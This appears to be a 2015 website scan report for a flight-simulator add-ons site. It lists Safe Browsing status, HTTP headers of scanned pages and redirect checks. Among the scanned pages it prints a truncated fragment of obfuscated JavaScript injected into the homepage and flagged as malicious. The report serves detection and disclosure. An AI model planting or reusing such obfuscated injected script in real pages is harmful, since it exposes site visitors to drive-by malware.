Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=flightsimulatorxaddons.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://flightsimulatorxaddons.com/ | HTTP/1.1 302 Moved Temporarily Connection: close Date: Tue, 03 Mar 2015 21:11:08 GMT Location: http://www.flightsimulatorxaddons.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.flightsimulatorxaddons.com/xmlrpc.php | clean |
http://www.flightsimulatorxaddons.com/ | 200 OK Content-Length: 89510 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4c","4h","44","3n","29","3e","18","4f","41","3m","4c","40","26","20","1p","22","48","4g","27","40","3n","41","3p","40","4c","26","20","24","1o","48", Antivirus reports:
| ||
http://www.flightsimulatorxaddons.com/wp-content/themes/adult_education_tee051/script.js | 200 OK Content-Length: 6355 Content-Type: application/x-javascript | clean |
http://bdv.bidvertiser.com/BidVertiser.dbm?pid=374326&bid=928219 | 200 OK Content-Length: 39 | clean |
http://bdv.bidvertiser.com/test404page.js | 200 OK Content-Length: 50 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: flightsimulatorxaddons.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 03 Mar 2015 21:11:08 GMT
Location: http://www.flightsimulatorxaddons.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.flightsimulatorxaddons.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: flightsimulatorxaddons.com
Result:
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Tue, 03 Mar 2015 21:11:08 GMT
Location: http://www.flightsimulatorxaddons.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.flightsimulatorxaddons.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: flightsimulatorxaddons.com
Referer: http://www.google.com/search?q=flightsimulatorxaddons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: flightsimulatorxaddons.com
Referer: http://www.google.com/search?q=flightsimulatorxaddons.com
Result:
The result is similar to the first query. There are no suspicious redirects found.